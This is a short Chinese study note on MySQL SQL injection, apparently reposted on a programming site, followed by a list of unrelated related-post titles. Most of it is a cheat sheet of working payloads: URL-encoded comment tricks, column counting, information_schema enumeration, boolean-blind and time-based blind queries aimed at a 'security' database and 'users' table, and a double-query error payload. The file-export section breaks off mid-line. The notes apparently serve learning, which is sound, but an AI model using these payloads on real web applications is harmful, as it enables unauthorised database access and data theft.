SQL注入学习笔记(一)
来源:互联网 发布:上海红歆财富 骗局知乎 编辑:程序博客网 时间:2024/06/05 04:38
空格是%20,单引号是%27, 井号是%23,双引号是%22 //常见urlencode
order by 3 //猜字段个数
select 1, 2, 3 //增加临时列
mysqli_fetch_array(
concat_ws(char(32,58,32), ‘语句1’, ‘语句2’…) //连接成字符串
limit 0,1 //选定待查询的记录行
substr((%s),1,1)
//爆库, 爆表, 爆字段
database: information_schema(包含了MySQL服务器所有数据库信息)
table: schemata (schema_name)
tables (table_schema, table_name)
columns (table_schema, table_name, column_name)
//布尔盲注
and length(database())>=0 %23
and ascii(substr(database(),1,1))>=0 %23
and (select count(table_name) from information_schema.tables where table_schema=’security’)>=0 %23
and (select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1)>=0 %23
and ascii(substr(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)>=0 %23
and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=0 %23
and (select length(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)>=0 %23
and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1))>=0 %23
//基于时间盲注
and if((注入布尔判断语句), 1, sleep(5)) %23
//聚合函数+分组语句->双注入
union select 1 from (select count(*), concat(floor(rand()*2), (注入爆数据语句))a from information_schema.tables group by a)b%23
//导出文件
select “
- SQL注入学习笔记(一)
- SQL注入学习笔记(一)
- SQL注入学习(一)
- SQL注入学习一
- SQL注入学习笔记
- sql注入学习笔记
- SQL注入学习笔记
- sql注入文章阅读笔记(一)
- SQL注入攻击与防御学习笔记一
- sql注入学习笔记(未完待续)
- Mysql注入学习笔记(一)
- sql注入--------学习篇一
- SQL注入(一)
- 预防SQL注入 学习笔记
- SQL 注入脚本学习笔记
- sql注入(笔记)
- SQL学习笔记(一)
- SQL学习笔记(一)
- OLAP函数系列1:SqlServer中分组函数GROUP BY 的扩展:all, cube,roolup与grouping
- mail 发送的几种方法
- java中权限修饰符
- hdu4841圆桌问题(STL)
- MySql学习笔记
- SQL注入学习笔记(一)
- 动态规划入门级教学(leetcode)121.Best Time to Buy and Sell Stock
- 2017暑期集训Day 14 区间dp+二分图匹配
- poj 2318 TOYS
- hihocoder 1398 : 网络流五·最大权闭合子图
- G
- poj 3468 线段树区间更新,模板题
- Log4c的使用
- Neural Networks